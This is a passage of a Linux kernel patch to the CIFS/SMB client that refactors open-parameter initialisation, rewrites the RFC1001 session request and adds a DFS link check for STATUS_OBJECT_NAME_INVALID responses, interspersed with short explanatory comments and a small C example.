+@@ -2843,72 +2843,48 @@ ip_rfc1001_connect(struct TCP_Server_Info *server)
+ 	 * negprot - BB check reconnection in case where second
+ 	 * sessinit is sent but no second negprot
+ 	 */
+-	struct rfc1002_session_packet *ses_init_buf;
+-	unsigned int req_noscope_len;
+-	struct smb_hdr *smb_buf;
++	struct rfc1002_session_packet req = {};
++	struct smb_hdr *smb_buf = (struct smb_hdr *)&req;
++	unsigned int len;
+ 
+-	ses_init_buf = kzalloc(sizeof(struct rfc1002_session_packet),
+-			       GFP_KERNEL);
++	req.trailer.session_req.called_len = sizeof(req.trailer.session_req.called_name);
+ 
+-	if (ses_init_buf) {
+-		ses_init_buf->trailer.session_req.called_len = 32;
++	if (server->server_RFC1001_name[0] != 0)
++		rfc1002mangle(req.trailer.session_req.called_name,
++			      server->server_RFC1001_name,
++			      RFC1001_NAME_LEN_WITH_NULL);
++	else
++		rfc1002mangle(req.trailer.session_req.called_name,
++			      DEFAULT_CIFS_CALLED_NAME,
++			      RFC1001_NAME_LEN_WITH_NULL);
+ 
+-		if (server->server_RFC1001_name[0] != 0)
+-			rfc1002mangle(ses_init_buf->trailer.
+-				      session_req.called_name,
+-				      server->server_RFC1001_name,
+-				      RFC1001_NAME_LEN_WITH_NULL);
+-		else
+-			rfc1002mangle(ses_init_buf->trailer.
+-				      session_req.called_name,
+-				      DEFAULT_CIFS_CALLED_NAME,
+-				      RFC1001_NAME_LEN_WITH_NULL);
++	req.trailer.session_req.calling_len = sizeof(req.trailer.session_req.calling_name);
+ 
+-		ses_init_buf->trailer.session_req.calling_len = 32;
++	/* calling name ends in null (byte 16) from old smb convention */
++	if (server->workstation_RFC1001_name[0] != 0)
++		rfc1002mangle(req.trailer.session_req.calling_name,
++			      server->workstation_RFC1001_name,
++			      RFC1001_NAME_LEN_WITH_NULL);
++	else
++		rfc1002mangle(req.trailer.session_req.calling_name,
++			      "LINUX_CIFS_CLNT",
++			      RFC1001_NAME_LEN_WITH_NULL);
+ 
+-		/*
+-		 * calling name ends in null (byte 16) from old smb
+-		 * convention.
+-		 */
+-		if (server->workstation_RFC1001_name[0] != 0)
+-			rfc1002mangle(ses_init_buf->trailer.
+-				      session_req.calling_name,
+-				      server->workstation_RFC1001_name,
+-				      RFC1001_NAME_LEN_WITH_NULL);
+-		else
+-			rfc1002mangle(ses_init_buf->trailer.
+-				      session_req.calling_name,
+-				      "LINUX_CIFS_CLNT",
+-				      RFC1001_NAME_LEN_WITH_NULL);
+-
+-		ses_init_buf->trailer.session_req.scope1 = 0;
+-		ses_init_buf->trailer.session_req.scope2 = 0;
+-		smb_buf = (struct smb_hdr *)ses_init_buf;
+-
+-		/* sizeof RFC1002_SESSION_REQUEST with no scopes */
+-		req_noscope_len = sizeof(struct rfc1002_session_packet) - 2;
+-
+-		/* == cpu_to_be32(0x81000044) */
+-		smb_buf->smb_buf_length =
+-			cpu_to_be32((RFC1002_SESSION_REQUEST << 24) | req_noscope_len);
+-		rc = smb_send(server, smb_buf, 0x44);
+-		kfree(ses_init_buf);
+-		/*
+-		 * RFC1001 layer in at least one server
+-		 * requires very short break before negprot
+-		 * presumably because not expecting negprot
+-		 * to follow so fast.  This is a simple
+-		 * solution that works without
+-		 * complicating the code and causes no
+-		 * significant slowing down on mount
+-		 * for everyone else
+-		 */
+-		usleep_range(1000, 2000);
+-	}
+ 	/*
+-	 * else the negprot may still work without this
+-	 * even though malloc failed
++	 * As per rfc1002, @len must be the number of bytes that follows the
++	 * length field of a rfc1002 session request payload.
++	 */
++	len = sizeof(req) - offsetof(struct rfc1002_session_packet, trailer.session_req);
++
++	smb_buf->smb_buf_length = cpu_to_be32((RFC1002_SESSION_REQUEST << 24) | len);
++	rc = smb_send(server, smb_buf, len);
++	/*
++	 * RFC1001 layer in at least one server requires very short break before
++	 * negprot presumably because not expecting negprot to follow so fast.
++	 * This is a simple solution that works without complicating the code
++	 * and causes no significant slowing down on mount for everyone else
+ 	 */
++	usleep_range(1000, 2000);
+ 
+ 	return rc;
+ }
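
The connect.c rewrite above derives the RFC1002 payload length from the struct layout with offsetof() instead of the old hand-counted 0x44. A standalone sketch of the idiom (the packet layout below is invented, though its trailer happens to total the same 68 bytes; no padding is introduced on common ABIs):

#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/*
 * Toy length-prefixed packet: the length field must count only the
 * bytes that follow it, so derive it from the layout with offsetof()
 * instead of hard-coding a magic constant.
 */
struct pkt_sketch {
	uint8_t  type;
	uint8_t  flags;
	uint16_t length;	/* big-endian on the wire */
	struct {
		char called[34];
		char calling[34];
	} trailer;
};

int main(void)
{
	size_t len = sizeof(struct pkt_sketch) -
		     offsetof(struct pkt_sketch, trailer);

	printf("payload length = %zu\n", len);	/* 68, i.e. 0x44 */
	return 0;
}

If the trailer layout ever changes, the computed length follows automatically; the magic 0x44 would silently go stale.
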
+diff --git a/fs/cifs/dir.c b/fs/cifs/dir.c
+index ad4208bf1e321..1bf61778f44c6 100644
+--- a/fs/cifs/dir.c
++++ b/fs/cifs/dir.c
+@@ -304,15 +304,16 @@ static int cifs_do_create(struct inode *inode, struct dentry *direntry, unsigned
+ 	if (!tcon->unix_ext && (mode & S_IWUGO) == 0)
+ 		create_options |= CREATE_OPTION_READONLY;
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = desired_access;
+-	oparms.create_options = cifs_create_options(cifs_sb, create_options);
+-	oparms.disposition = disposition;
+-	oparms.path = full_path;
+-	oparms.fid = fid;
+-	oparms.reconnect = false;
+-	oparms.mode = mode;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = desired_access,
++		.create_options = cifs_create_options(cifs_sb, create_options),
++		.disposition = disposition,
++		.path = full_path,
++		.fid = fid,
++		.mode = mode,
++	};
+ 	rc = server->ops->open(xid, &oparms, oplock, buf);
+ 	if (rc) {
+ 		cifs_dbg(FYI, "cifs_create returned 0x%x\n", rc);
+diff --git a/fs/cifs/file.c b/fs/cifs/file.c
+index b8d1cbadb6897..a53ddc81b698c 100644
+--- a/fs/cifs/file.c
++++ b/fs/cifs/file.c
+@@ -260,14 +260,15 @@ static int cifs_nt_open(const char *full_path, struct inode *inode, struct cifs_
+ 	if (f_flags & O_DIRECT)
+ 		create_options |= CREATE_NO_BUFFER;
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = desired_access;
+-	oparms.create_options = cifs_create_options(cifs_sb, create_options);
+-	oparms.disposition = disposition;
+-	oparms.path = full_path;
+-	oparms.fid = fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = desired_access,
++		.create_options = cifs_create_options(cifs_sb, create_options),
++		.disposition = disposition,
++		.path = full_path,
++		.fid = fid,
++	};
+ 
+ 	rc = server->ops->open(xid, &oparms, oplock, buf);
+ 	if (rc)
+@@ -848,14 +849,16 @@ cifs_reopen_file(struct cifsFileInfo *cfile, bool can_flush)
+ 	if (server->ops->get_lease_key)
+ 		server->ops->get_lease_key(inode, &cfile->fid);
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = desired_access;
+-	oparms.create_options = cifs_create_options(cifs_sb, create_options);
+-	oparms.disposition = disposition;
+-	oparms.path = full_path;
+-	oparms.fid = &cfile->fid;
+-	oparms.reconnect = true;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = desired_access,
++		.create_options = cifs_create_options(cifs_sb, create_options),
++		.disposition = disposition,
++		.path = full_path,
++		.fid = &cfile->fid,
++		.reconnect = true,
++	};
+ 
+ 	/*
+ 	 * Can not refresh inode by passing in file_info buf to be returned by
+diff --git a/fs/cifs/inode.c b/fs/cifs/inode.c
+index f145a59af89be..7d0cc39d2921f 100644
+--- a/fs/cifs/inode.c
++++ b/fs/cifs/inode.c
+@@ -508,14 +508,15 @@ cifs_sfu_type(struct cifs_fattr *fattr, const char *path,
+ 		return PTR_ERR(tlink);
+ 	tcon = tlink_tcon(tlink);
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = GENERIC_READ;
+-	oparms.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR);
+-	oparms.disposition = FILE_OPEN;
+-	oparms.path = path;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = GENERIC_READ,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
++		.disposition = FILE_OPEN,
++		.path = path,
++		.fid = &fid,
++	};
+ 
+ 	if (tcon->ses->server->oplocks)
+ 		oplock = REQ_OPLOCK;
+@@ -1518,14 +1519,15 @@ cifs_rename_pending_delete(const char *full_path, struct dentry *dentry,
+ 		goto out;
+ 	}
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = DELETE | FILE_WRITE_ATTRIBUTES;
+-	oparms.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR);
+-	oparms.disposition = FILE_OPEN;
+-	oparms.path = full_path;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = DELETE | FILE_WRITE_ATTRIBUTES,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
++		.disposition = FILE_OPEN,
++		.path = full_path,
++		.fid = &fid,
++	};
+ 
+ 	rc = CIFS_open(xid, &oparms, &oplock, NULL);
+ 	if (rc != 0)
+@@ -2112,15 +2114,16 @@ cifs_do_rename(const unsigned int xid, struct dentry *from_dentry,
+ 	if (to_dentry->d_parent != from_dentry->d_parent)
+ 		goto do_rename_exit;
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	/* open the file to be renamed -- we need DELETE perms */
+-	oparms.desired_access = DELETE;
+-	oparms.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR);
+-	oparms.disposition = FILE_OPEN;
+-	oparms.path = from_path;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		/* open the file to be renamed -- we need DELETE perms */
++		.desired_access = DELETE,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
++		.disposition = FILE_OPEN,
++		.path = from_path,
++		.fid = &fid,
++	};
+ 
+ 	rc = CIFS_open(xid, &oparms, &oplock, NULL);
+ 	if (rc == 0) {
+diff --git a/fs/cifs/link.c b/fs/cifs/link.c
+index a5a097a699837..d937eedd74fb6 100644
+--- a/fs/cifs/link.c
++++ b/fs/cifs/link.c
+@@ -271,14 +271,15 @@ cifs_query_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
+ 	int buf_type = CIFS_NO_BUFFER;
+ 	FILE_ALL_INFO file_info;
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = GENERIC_READ;
+-	oparms.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR);
+-	oparms.disposition = FILE_OPEN;
+-	oparms.path = path;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = GENERIC_READ,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
++		.disposition = FILE_OPEN,
++		.path = path,
++		.fid = &fid,
++	};
+ 
+ 	rc = CIFS_open(xid, &oparms, &oplock, &file_info);
+ 	if (rc)
+@@ -313,14 +314,15 @@ cifs_create_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
+ 	struct cifs_open_parms oparms;
+ 	struct cifs_io_parms io_parms = {0};
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = GENERIC_WRITE;
+-	oparms.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR);
+-	oparms.disposition = FILE_CREATE;
+-	oparms.path = path;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = GENERIC_WRITE,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
++		.disposition = FILE_CREATE,
++		.path = path,
++		.fid = &fid,
++	};
+ 
+ 	rc = CIFS_open(xid, &oparms, &oplock, NULL);
+ 	if (rc)
+@@ -355,13 +357,14 @@ smb3_query_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
+ 	__u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
+ 	struct smb2_file_all_info *pfile_info = NULL;
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = GENERIC_READ;
+-	oparms.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR);
+-	oparms.disposition = FILE_OPEN;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = GENERIC_READ,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
++		.disposition = FILE_OPEN,
++		.fid = &fid,
++	};
+ 
+ 	utf16_path = cifs_convert_path_to_utf16(path, cifs_sb);
+ 	if (utf16_path == NULL)
+@@ -421,14 +424,15 @@ smb3_create_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
+ 	if (!utf16_path)
+ 		return -ENOMEM;
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = GENERIC_WRITE;
+-	oparms.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR);
+-	oparms.disposition = FILE_CREATE;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
+-	oparms.mode = 0644;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = GENERIC_WRITE,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
++		.disposition = FILE_CREATE,
++		.fid = &fid,
++		.mode = 0644,
++	};
+ 
+ 	rc = SMB2_open(xid, &oparms, utf16_path, &oplock, NULL, NULL,
+ 		       NULL, NULL);
+diff --git a/fs/cifs/misc.c b/fs/cifs/misc.c
+index 2a19c7987c5bd..ae0679f0c0d25 100644
+--- a/fs/cifs/misc.c
++++ b/fs/cifs/misc.c
+@@ -21,6 +21,7 @@
+ #include "cifsfs.h"
+ #ifdef CONFIG_CIFS_DFS_UPCALL
+ #include "dns_resolve.h"
++#include "dfs_cache.h"
+ #endif
+ #include "fs_context.h"
+ #include "cached_dir.h"
+@@ -1300,4 +1301,70 @@ int cifs_update_super_prepath(struct cifs_sb_info *cifs_sb, char *prefix)
+ 	cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_USE_PREFIX_PATH;
+ 	return 0;
+ }
++
++/*
++ * Handle weird Windows SMB server behaviour. It responds with
++ * STATUS_OBJECT_NAME_INVALID code to SMB2 QUERY_INFO request for
++ * "\<server>\<dfsname>\<linkpath>" DFS reference, where <dfsname> contains
++ * non-ASCII unicode symbols.
++ */
++int cifs_inval_name_dfs_link_error(const unsigned int xid,
++				   struct cifs_tcon *tcon,
++				   struct cifs_sb_info *cifs_sb,
++				   const char *full_path,
++				   bool *islink)
++{
++	struct cifs_ses *ses = tcon->ses;
++	size_t len;
++	char *path;
++	char *ref_path;
++
++	*islink = false;
++
++	/*
++	 * Fast path - skip check when @full_path doesn't have a prefix path to
++	 * look up or tcon is not DFS.
++	 */
++	if (strlen(full_path) < 2 || !cifs_sb ||
++	    (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_DFS) ||
++	    !is_tcon_dfs(tcon) || !ses->server->origin_fullpath)
++		return 0;
++
++	/*
++	 * Slow path - tcon is DFS and @full_path has prefix path, so attempt
++	 * to get a referral to figure out whether it is a DFS link.
++	 */
++	len = strnlen(tcon->tree_name, MAX_TREE_SIZE + 1) + strlen(full_path) + 1;
++	path = kmalloc(len, GFP_KERNEL);
++	if (!path)
++		return -ENOMEM;
++
++	scnprintf(path, len, "%s%s", tcon->tree_name, full_path);
++	ref_path = dfs_cache_canonical_path(path + 1, cifs_sb->local_nls,
++					    cifs_remap(cifs_sb));
++	kfree(path);
++
++	if (IS_ERR(ref_path)) {
++		if (PTR_ERR(ref_path) != -EINVAL)
++			return PTR_ERR(ref_path);
++	} else {
++		struct dfs_info3_param *refs = NULL;
++		int num_refs = 0;
++
++		/*
++		 * XXX: we are not using dfs_cache_find() here because we might
++		 * end up filling all the DFS cache and thus potentially
++		 * removing cached DFS targets that the client would eventually
++		 * need during failover.
++		 */
++		if (ses->server->ops->get_dfs_refer &&
++		    !ses->server->ops->get_dfs_refer(xid, ses, ref_path, &refs,
++						     &num_refs, cifs_sb->local_nls,
++						     cifs_remap(cifs_sb)))
++			*islink = refs[0].server_type == DFS_TYPE_LINK;
++		free_dfs_info_array(refs, num_refs);
++		kfree(ref_path);
++	}
++	return 0;
++}
+ #endif
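
Later hunks in this patch (fs/cifs/smb2inode.c and fs/cifs/smb2ops.c) call this new
helper when a query fails with STATUS_OBJECT_NAME_INVALID, and only convert the
failure into -EREMOTE when the path really resolves to a DFS link. The call shape,
paraphrased from those hunks:

    rc2 = cifs_inval_name_dfs_link_error(xid, tcon, cifs_sb,
                                         full_path, &islink);
    if (rc2)
            rc = rc2;               /* the referral lookup itself failed */
    else if (islink)
            rc = -EREMOTE;          /* genuine DFS link: caller chases it */
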
+diff --git a/fs/cifs/smb1ops.c b/fs/cifs/smb1ops.c
+index 4cb364454e130..abda6148be10f 100644
+--- a/fs/cifs/smb1ops.c
++++ b/fs/cifs/smb1ops.c
+@@ -576,14 +576,15 @@ static int cifs_query_path_info(const unsigned int xid, struct cifs_tcon *tcon,
+ 		if (!(le32_to_cpu(fi.Attributes) & ATTR_REPARSE))
+ 			return 0;
+ 
+-		oparms.tcon = tcon;
+-		oparms.cifs_sb = cifs_sb;
+-		oparms.desired_access = FILE_READ_ATTRIBUTES;
+-		oparms.create_options = cifs_create_options(cifs_sb, 0);
+-		oparms.disposition = FILE_OPEN;
+-		oparms.path = full_path;
+-		oparms.fid = &fid;
+-		oparms.reconnect = false;
++		oparms = (struct cifs_open_parms) {
++			.tcon = tcon,
++			.cifs_sb = cifs_sb,
++			.desired_access = FILE_READ_ATTRIBUTES,
++			.create_options = cifs_create_options(cifs_sb, 0),
++			.disposition = FILE_OPEN,
++			.path = full_path,
++			.fid = &fid,
++		};
+ 
+ 		/* Need to check if this is a symbolic link or not */
+ 		tmprc = CIFS_open(xid, &oparms, &oplock, NULL);
+@@ -823,14 +824,15 @@ smb_set_file_info(struct inode *inode, const char *full_path,
+ 		goto out;
+ 	}
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = SYNCHRONIZE | FILE_WRITE_ATTRIBUTES;
+-	oparms.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR);
+-	oparms.disposition = FILE_OPEN;
+-	oparms.path = full_path;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = SYNCHRONIZE | FILE_WRITE_ATTRIBUTES,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
++		.disposition = FILE_OPEN,
++		.path = full_path,
++		.fid = &fid,
++	};
+ 
+ 	cifs_dbg(FYI, "calling SetFileInfo since SetPathInfo for times not supported by this server\n");
+ 	rc = CIFS_open(xid, &oparms, &oplock, NULL);
+@@ -998,15 +1000,16 @@ cifs_query_symlink(const unsigned int xid, struct cifs_tcon *tcon,
+ 		goto out;
+ 	}
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = FILE_READ_ATTRIBUTES;
+-	oparms.create_options = cifs_create_options(cifs_sb,
+-						    OPEN_REPARSE_POINT);
+-	oparms.disposition = FILE_OPEN;
+-	oparms.path = full_path;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = FILE_READ_ATTRIBUTES,
++		.create_options = cifs_create_options(cifs_sb,
++						      OPEN_REPARSE_POINT),
++		.disposition = FILE_OPEN,
++		.path = full_path,
++		.fid = &fid,
++	};
+ 
+ 	rc = CIFS_open(xid, &oparms, &oplock, NULL);
+ 	if (rc)
+@@ -1115,15 +1118,16 @@ cifs_make_node(unsigned int xid, struct inode *inode,
+ 
+ 	cifs_dbg(FYI, "sfu compat create special file\n");
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = GENERIC_WRITE;
+-	oparms.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR |
+-						    CREATE_OPTION_SPECIAL);
+-	oparms.disposition = FILE_CREATE;
+-	oparms.path = full_path;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = GENERIC_WRITE,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR |
++						      CREATE_OPTION_SPECIAL),
++		.disposition = FILE_CREATE,
++		.path = full_path,
++		.fid = &fid,
++	};
+ 
+ 	if (tcon->ses->server->oplocks)
+ 		oplock = REQ_OPLOCK;
+diff --git a/fs/cifs/smb2inode.c b/fs/cifs/smb2inode.c
+index 8521adf9ce790..9b956294e8643 100644
+--- a/fs/cifs/smb2inode.c
++++ b/fs/cifs/smb2inode.c
+@@ -105,14 +105,15 @@ static int smb2_compound_op(const unsigned int xid, struct cifs_tcon *tcon,
+ 		goto finished;
+ 	}
+ 
+-	vars->oparms.tcon = tcon;
+-	vars->oparms.desired_access = desired_access;
+-	vars->oparms.disposition = create_disposition;
+-	vars->oparms.create_options = cifs_create_options(cifs_sb, create_options);
+-	vars->oparms.fid = &fid;
+-	vars->oparms.reconnect = false;
+-	vars->oparms.mode = mode;
+-	vars->oparms.cifs_sb = cifs_sb;
++	vars->oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.desired_access = desired_access,
++		.disposition = create_disposition,
++		.create_options = cifs_create_options(cifs_sb, create_options),
++		.fid = &fid,
++		.mode = mode,
++		.cifs_sb = cifs_sb,
++	};
+ 
+ 	rqst[num_rqst].rq_iov = &vars->open_iov[0];
+ 	rqst[num_rqst].rq_nvec = SMB2_CREATE_IOV_SIZE;
+@@ -526,12 +527,13 @@ int smb2_query_path_info(const unsigned int xid, struct cifs_tcon *tcon,
+ 			 struct cifs_sb_info *cifs_sb, const char *full_path,
+ 			 struct cifs_open_info_data *data, bool *adjust_tz, bool *reparse)
+ {
+-	int rc;
+ 	__u32 create_options = 0;
+ 	struct cifsFileInfo *cfile;
+ 	struct cached_fid *cfid = NULL;
+ 	struct kvec err_iov[3] = {};
+ 	int err_buftype[3] = {};
++	bool islink;
++	int rc, rc2;
+ 
+ 	*adjust_tz = false;
+ 	*reparse = false;
+@@ -579,15 +581,15 @@ int smb2_query_path_info(const unsigned int xid, struct cifs_tcon *tcon,
+ 					      SMB2_OP_QUERY_INFO, cfile, NULL, NULL,
+ 					      NULL, NULL);
+ 			goto out;
+-		} else if (rc != -EREMOTE && IS_ENABLED(CONFIG_CIFS_DFS_UPCALL) &&
+-			   hdr->Status == STATUS_OBJECT_NAME_INVALID) {
+-			/*
+-			 * Handle weird Windows SMB server behaviour. It responds with
+-			 * STATUS_OBJECT_NAME_INVALID code to SMB2 QUERY_INFO request
+-			 * for "\<server>\<dfsname>\<linkpath>" DFS reference,
+-			 * where <dfsname> contains non-ASCII unicode symbols.
+-			 */
+-			rc = -EREMOTE;
++		} else if (rc != -EREMOTE && hdr->Status == STATUS_OBJECT_NAME_INVALID) {
++			rc2 = cifs_inval_name_dfs_link_error(xid, tcon, cifs_sb,
++							     full_path, &islink);
++			if (rc2) {
++				rc = rc2;
++				goto out;
++			}
++			if (islink)
++				rc = -EREMOTE;
+ 		}
+ 		if (rc == -EREMOTE && IS_ENABLED(CONFIG_CIFS_DFS_UPCALL) && cifs_sb &&
+ 		    (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_DFS))
+diff --git a/fs/cifs/smb2ops.c b/fs/cifs/smb2ops.c
+index e6bcd2baf446a..c7f8dba5a855a 100644
+--- a/fs/cifs/smb2ops.c
++++ b/fs/cifs/smb2ops.c
+@@ -729,12 +729,13 @@ smb3_qfs_tcon(const unsigned int xid, struct cifs_tcon *tcon,
+ 	struct cifs_fid fid;
+ 	struct cached_fid *cfid = NULL;
+ 
+-	oparms.tcon = tcon;
+-	oparms.desired_access = FILE_READ_ATTRIBUTES;
+-	oparms.disposition = FILE_OPEN;
+-	oparms.create_options = cifs_create_options(cifs_sb, 0);
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.desired_access = FILE_READ_ATTRIBUTES,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.fid = &fid,
++	};
+ 
+ 	rc = open_cached_dir(xid, tcon, "", cifs_sb, false, &cfid);
+ 	if (rc == 0)
+@@ -771,12 +772,13 @@ smb2_qfs_tcon(const unsigned int xid, struct cifs_tcon *tcon,
+ 	struct cifs_open_parms oparms;
+ 	struct cifs_fid fid;
+ 
+-	oparms.tcon = tcon;
+-	oparms.desired_access = FILE_READ_ATTRIBUTES;
+-	oparms.disposition = FILE_OPEN;
+-	oparms.create_options = cifs_create_options(cifs_sb, 0);
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.desired_access = FILE_READ_ATTRIBUTES,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.fid = &fid,
++	};
+ 
+ 	rc = SMB2_open(xid, &oparms, &srch_path, &oplock, NULL, NULL,
+ 		       NULL, NULL);
+@@ -794,7 +796,6 @@ static int
+ smb2_is_path_accessible(const unsigned int xid, struct cifs_tcon *tcon,
+ 			struct cifs_sb_info *cifs_sb, const char *full_path)
+ {
+-	int rc;
+ 	__le16 *utf16_path;
+ 	__u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
+ 	int err_buftype = CIFS_NO_BUFFER;
+@@ -802,6 +803,8 @@ smb2_is_path_accessible(const unsigned int xid, struct cifs_tcon *tcon,
+ 	struct kvec err_iov = {};
+ 	struct cifs_fid fid;
+ 	struct cached_fid *cfid;
++	bool islink;
++	int rc, rc2;
+ 
+ 	rc = open_cached_dir(xid, tcon, full_path, cifs_sb, true, &cfid);
+ 	if (!rc) {
+@@ -816,12 +819,13 @@ smb2_is_path_accessible(const unsigned int xid, struct cifs_tcon *tcon,
+ 	if (!utf16_path)
+ 		return -ENOMEM;
+ 
+-	oparms.tcon = tcon;
+-	oparms.desired_access = FILE_READ_ATTRIBUTES;
+-	oparms.disposition = FILE_OPEN;
+-	oparms.create_options = cifs_create_options(cifs_sb, 0);
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.desired_access = FILE_READ_ATTRIBUTES,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.fid = &fid,
++	};
+ 
+ 	rc = SMB2_open(xid, &oparms, utf16_path, &oplock, NULL, NULL,
+ 		       &err_iov, &err_buftype);
+@@ -830,15 +834,17 @@ smb2_is_path_accessible(const unsigned int xid, struct cifs_tcon *tcon,
+ 
+ 		if (unlikely(!hdr || err_buftype == CIFS_NO_BUFFER))
+ 			goto out;
+-		/*
+-		 * Handle weird Windows SMB server behaviour. It responds with
+-		 * STATUS_OBJECT_NAME_INVALID code to SMB2 QUERY_INFO request
+-		 * for "\<server>\<dfsname>\<linkpath>" DFS reference,
+-		 * where <dfsname> contains non-ASCII unicode symbols.
+-		 */
+-		if (rc != -EREMOTE && IS_ENABLED(CONFIG_CIFS_DFS_UPCALL) &&
+-		    hdr->Status == STATUS_OBJECT_NAME_INVALID)
+-			rc = -EREMOTE;
++
++		if (rc != -EREMOTE && hdr->Status == STATUS_OBJECT_NAME_INVALID) {
++			rc2 = cifs_inval_name_dfs_link_error(xid, tcon, cifs_sb,
++							     full_path, &islink);
++			if (rc2) {
++				rc = rc2;
++				goto out;
++			}
++			if (islink)
++				rc = -EREMOTE;
++		}
+ 		if (rc == -EREMOTE && IS_ENABLED(CONFIG_CIFS_DFS_UPCALL) && cifs_sb &&
+ 		    (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_DFS))
+ 			rc = -EOPNOTSUPP;
+@@ -1097,13 +1103,13 @@ smb2_set_ea(const unsigned int xid, struct cifs_tcon *tcon,
+ 	rqst[0].rq_iov = open_iov;
+ 	rqst[0].rq_nvec = SMB2_CREATE_IOV_SIZE;
+ 
+-	memset(&oparms, 0, sizeof(oparms));
+-	oparms.tcon = tcon;
+-	oparms.desired_access = FILE_WRITE_EA;
+-	oparms.disposition = FILE_OPEN;
+-	oparms.create_options = cifs_create_options(cifs_sb, 0);
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
